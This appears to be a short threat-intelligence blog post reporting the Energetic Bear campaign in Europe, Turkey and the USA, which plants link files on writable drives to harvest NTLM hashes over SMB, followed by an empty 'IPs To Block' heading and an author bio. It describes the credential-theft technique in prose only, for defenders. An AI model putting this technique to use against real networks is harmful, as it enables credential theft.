he Russia-based advanced persistent threat group Energetic Bear are involved in an ongoing campaign throughout Europe, Turkey and the USA.
Energetic Bear’s goal appears to be the collection of Network LAN Manager (NTLM) credentials via SMB; with the first confirmed attacks reported in March 2017, although it is possible the campaign began before this date.
Once Energetic Bear have access to the target network they will enumerate any drives they have write permissions to and place link files. Any host that views these links will attempt to load a file from the compromised server, sending their NTLM hash in the process, which is then harvested.
The majority of C&C servers appear to be hosted on compromised servers running content management systems, indicating that the attackers may have used the same exploit to gain control of each server.
Further technical details can be found here.
IPs To Block
- Windows and Linux-based Servers
Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.